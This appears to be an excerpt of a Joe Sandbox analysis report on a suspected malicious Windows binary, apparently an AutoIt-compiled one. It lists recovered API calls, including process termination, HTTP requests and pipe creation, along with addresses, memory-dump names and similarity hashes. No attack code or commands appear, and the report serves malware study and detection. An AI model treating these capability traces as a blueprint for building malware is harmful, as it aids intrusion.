• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00385437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0038543E
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 914e164386649a0eace253c444eb1396bf3999f08e33203656cfcdfab3b9cf89
• Instruction ID: fad1137ca1a165a89a3359703075e1d6fa2950846a713d298d5622b7a506ccdf
• Opcode Fuzzy Hash: 914e164386649a0eace253c444eb1396bf3999f08e33203656cfcdfab3b9cf89
• Instruction Fuzzy Hash: 00F01D36241558BFE7225BE2DC0EEAB7B7CEBC7B11F000169FA04D10A196A51A0186B5

APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00387243
• EnterCriticalSection.KERNEL32(?,?,00330EE4,?,?), ref: 00387254
• TerminateThread.KERNEL32(00000000,000001F6,?,00330EE4,?,?), ref: 00387261
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00330EE4,?,?), ref: 0038726E
  • Part of subcall function 00386C35: CloseHandle.KERNEL32(00000000,?,0038727B,?,00330EE4,?,?), ref: 00386C3F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00387281
• LeaveCriticalSection.KERNEL32(?,?,00330EE4,?,?), ref: 00387288
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 2a212853be39d4149687258d5cce5ab29af9abcabbd29c6d688f9817ca4d9081
• Instruction ID: 4a8dd8c65a7619689fb5a1f511e2ae346a6db4a73bdfff8d0aa05c190fcc247e
• Opcode Fuzzy Hash: 2a212853be39d4149687258d5cce5ab29af9abcabbd29c6d688f9817ca4d9081
• Instruction Fuzzy Hash: A4F05E3A540712EFD7632BA4ED8CAEA773EEF46702F110971F503950A0DB7A5801CB50

APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0037899D
• UnloadUserProfile.USERENV(?,?), ref: 003789A9
• CloseHandle.KERNEL32(?), ref: 003789B2
• CloseHandle.KERNEL32(?), ref: 003789BA
• GetProcessHeap.KERNEL32(00000000,?), ref: 003789C3
• HeapFree.KERNEL32(00000000), ref: 003789CA
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 5083cad9ad6b9d4d946a8a33368fa409b12b5bbb4b7f3986bc1e8c49f58d3e24
• Instruction ID: cc831161a35e6e0ee299a24149ee31057407870dd8ed9074bfb7ee253f50e8a8
• Opcode Fuzzy Hash: 5083cad9ad6b9d4d946a8a33368fa409b12b5bbb4b7f3986bc1e8c49f58d3e24
• Instruction Fuzzy Hash: 0DE05276104505FFDB021FE5EC0C95ABB6DFB8A762B508631F219814B0CB329461DB50

                                                                                                                    APIs
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003B2C7C,?), ref: 003776EA
                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003B2C7C,?), ref: 00377702
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,003AFB80,000000FF,?,00000000,00000800,00000000,?,003B2C7C,?), ref: 00377727
                                                                                                                    • _memcmp.LIBCMT ref: 00377748
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                    • String ID: ,,;
                                                                                                                    • API String ID: 314563124-1177347100
                                                                                                                    • Opcode ID: fc4940976a1b969fbbe4da6c4f02d74ad399cc4f631ee430e639ddfde8e5bb78
                                                                                                                    • Instruction ID: a2e88c0d3c975683e8872f77d5eeafcc7eb44dd2b82fc14aff44473ced284f1b
                                                                                                                    • Opcode Fuzzy Hash: fc4940976a1b969fbbe4da6c4f02d74ad399cc4f631ee430e639ddfde8e5bb78
                                                                                                                    • Instruction Fuzzy Hash: EB813C75A00109EFCB15DFE4C984EEEB7B9FF89315F208158E509AB250DB75AE06CB60
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00398613
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00398722
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0039889A
                                                                                                                      • Part of subcall function 00387562: VariantInit.OLEAUT32(00000000), ref: 003875A2
                                                                                                                      • Part of subcall function 00387562: VariantCopy.OLEAUT32(00000000,?), ref: 003875AB
                                                                                                                      • Part of subcall function 00387562: VariantClear.OLEAUT32(00000000), ref: 003875B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                    • Opcode ID: 7c271ffc6c9cf01e8f22f82a36b74b9e5978f10025bbd116dfca05d01d9ad51d
                                                                                                                    • Instruction ID: 96726b73f0b323ab0aea1163761f8a3e32b69ef3bf249d0d22c28d400b373aba
                                                                                                                    • Opcode Fuzzy Hash: 7c271ffc6c9cf01e8f22f82a36b74b9e5978f10025bbd116dfca05d01d9ad51d
                                                                                                                    • Instruction Fuzzy Hash: AF917C716083019FCB11DF24C48495ABBE8EFCA714F14896EF99A8B361DB31E945CB92
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0033FC86: _wcscpy.LIBCMT ref: 0033FCA9
                                                                                                                    • _memset.LIBCMT ref: 00382B87
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00382BB6
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00382C69
                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00382C97
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 4152858687-4108050209
                                                                                                                    • Opcode ID: 8fd98485b79d6ac5643a28a35917f502773bdacb05253f8530ddd5b41024a31b
                                                                                                                    • Instruction ID: eb39bac54ec626db0f2af4b3ae38da720d9690b730ce888beb6302a5ec484357
                                                                                                                    • Opcode Fuzzy Hash: 8fd98485b79d6ac5643a28a35917f502773bdacb05253f8530ddd5b41024a31b
                                                                                                                    • Instruction Fuzzy Hash: 6151BB716093009ED72BAE28D845A7FB7E8EF89310F150A6DF895DA2E0DB70DD448792
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_free
                                                                                                                    • String ID: 3c3$_3
                                                                                                                    • API String ID: 2620147621-176681986
                                                                                                                    • Opcode ID: ccb992a9fa2c969f6f1224eb4460d59cc35741a10802d44ea17cf0ff1ae314a0
                                                                                                                    • Instruction ID: 4ef4d0a80383e884823469b0d77b5eff190cdb0ab0b40306179e1ddaa3d74d39
                                                                                                                    • Opcode Fuzzy Hash: ccb992a9fa2c969f6f1224eb4460d59cc35741a10802d44ea17cf0ff1ae314a0
                                                                                                                    • Instruction Fuzzy Hash: 60516E71A083418FDB26CF29C481B6ABBF5BF85350F45882DE589CB351DB35E941CB42
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$_memmove
                                                                                                                    • String ID: 3c3$ERCP
                                                                                                                    • API String ID: 2532777613-291258027
                                                                                                                    • Opcode ID: 35682f7ed5f5846044dcc7d6319985ef5567189a245cfb4d02aff785c2d86dd7
                                                                                                                    • Instruction ID: 1f1da7021f96ce0629139359d6ade6fdbb91dce63bddf51e9be2fb832950d3bd
                                                                                                                    • Opcode Fuzzy Hash: 35682f7ed5f5846044dcc7d6319985ef5567189a245cfb4d02aff785c2d86dd7
                                                                                                                    • Instruction Fuzzy Hash: C6519071900705EFDB26CF55C9827ABB7F8EF04314F21896EE54ADB291E774AA44CB40
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003827C0
                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003827DC
                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00382822
                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003E5890,00000000), ref: 0038286B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1173514356-4108050209
                                                                                                                    • Opcode ID: 6cb1b8d535c72311525de64e31a2a5830721d46e87c565f48d72a5fbefd4f788
                                                                                                                    • Instruction ID: 0396d85e938764a05973956bbb91725141d42ea0658c85c7beca0155ee6dfc92
                                                                                                                    • Opcode Fuzzy Hash: 6cb1b8d535c72311525de64e31a2a5830721d46e87c565f48d72a5fbefd4f788
                                                                                                                    • Instruction Fuzzy Hash: DE41B270604301AFDB22EF25CC44B1BBBE8EF85314F0549AEF8659B291D730E905CB52
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0039D7C5
                                                                                                                      • Part of subcall function 0032784B: _memmove.LIBCMT ref: 00327899
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower_memmove
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 3425801089-567219261
                                                                                                                    • Opcode ID: 84824f08bdec38f9bfc49cf5c3dafd8f07883cac42ca03d32de35e9136aaa272
                                                                                                                    • Instruction ID: dfdbbfb43dcd54192a610c43961583e95a4b9efd87caa2d6d5c26c370c876b8e
                                                                                                                    • Opcode Fuzzy Hash: 84824f08bdec38f9bfc49cf5c3dafd8f07883cac42ca03d32de35e9136aaa272
                                                                                                                    • Instruction Fuzzy Hash: A531B475904219AFCF06EF54DC529FEB3B4FF05320B10862AE8259B7D2DB31A905CB80
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00378F14
                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00378F27
                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00378F57
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 365058703-1403004172
                                                                                                                    • Opcode ID: 28549a7c9e4a0a7e8e96daa631c93ad07cf2f43df16232de283482bff0f4e048
                                                                                                                    • Instruction ID: 30c933b3cd374bae971f4195f084f25322a789447dc6a5ff197097e72d6dd245
                                                                                                                    • Opcode Fuzzy Hash: 28549a7c9e4a0a7e8e96daa631c93ad07cf2f43df16232de283482bff0f4e048
                                                                                                                    • Instruction Fuzzy Hash: 4F210471A44104BEDB26ABB0EC4ACFFB76DDF06320F048519F4299B2E0DF3949099650
                                                                                                                    APIs
                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0039184C
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00391872
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003918A2
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 003918E9
                                                                                                                      • Part of subcall function 00392483: GetLastError.KERNEL32(?,?,00391817,00000000,00000000,00000001), ref: 00392498
                                                                                                                      • Part of subcall function 00392483: SetEvent.KERNEL32(?,?,00391817,00000000,00000000,00000001), ref: 003924AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    • Opcode ID: 94e0b2e925cb5926e32394a0e2d3c62a0b982c20fd86c70aec693e44778c253d
                                                                                                                    • Instruction ID: b7346ba63a6b546b6d939b303b82b06347b90377beb4b7a61af6d5e81246e739
                                                                                                                    • Opcode Fuzzy Hash: 94e0b2e925cb5926e32394a0e2d3c62a0b982c20fd86c70aec693e44778c253d
                                                                                                                    • Instruction Fuzzy Hash: EA21C2B6504309BFEF139F61DC85EBF77EDEB49744F10412AF805A6140DB219D0467A1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00321D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00321D73
                                                                                                                      • Part of subcall function 00321D35: GetStockObject.GDI32(00000011), ref: 00321D87
                                                                                                                      • Part of subcall function 00321D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00321D91
                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003A6461
                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 003A6468
                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003A647D
                                                                                                                    • DestroyWindow.USER32(?), ref: 003A6485
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                    • Opcode ID: 36ad7a524e84d70d2af69906166ba3064b207f12f1de1a367083d7f4f34b6646
                                                                                                                    • Instruction ID: 4edd89d0e76b0015285392dc03b8b39f107cff24b9f47cbabf45edfd696aa298
                                                                                                                    • Opcode Fuzzy Hash: 36ad7a524e84d70d2af69906166ba3064b207f12f1de1a367083d7f4f34b6646
                                                                                                                    • Instruction Fuzzy Hash: 15219D71200205BFEF124FA5DC82EBB37ADEB5A328F194629FA10961E0D771DC51A760
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00386DBC
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00386DEF
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00386E01
                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00386E3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    • Opcode ID: 4ce6008359ade0d7788d889dff8f614fcb3f822472d8f86d081733927529b4ea
                                                                                                                    • Instruction ID: 448733e0f780a12bbc1735d374fac8cd31d9d62afc7ae5fddc7add4172a87ca2
                                                                                                                    • Opcode Fuzzy Hash: 4ce6008359ade0d7788d889dff8f614fcb3f822472d8f86d081733927529b4ea
                                                                                                                    • Instruction Fuzzy Hash: 3221A475600309AFDB22AF69DC06B9A77F8EF85720F204A99FCA1D72D0D770A954CB50
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00386E89
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00386EBB
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00386ECC
                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00386F06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    • Opcode ID: da0df2b7a3d516b154a15f020578948e56f807759720449e10350ddb746c987c
                                                                                                                    • Instruction ID: f93dcae68abb58788a3474f0f2cfbe56eef67934cbfaf113afd458e12cdb6533
                                                                                                                    • Opcode Fuzzy Hash: da0df2b7a3d516b154a15f020578948e56f807759720449e10350ddb746c987c
                                                                                                                    • Instruction Fuzzy Hash: 3C21A1796003059FDB22AF69DD06A9A77B8EF45720F200A99FDE1D72D0DB70A850CB60
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038AC54
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0038ACA8
                                                                                                                    • __swprintf.LIBCMT ref: 0038ACC1
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,003AF910), ref: 0038ACFF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
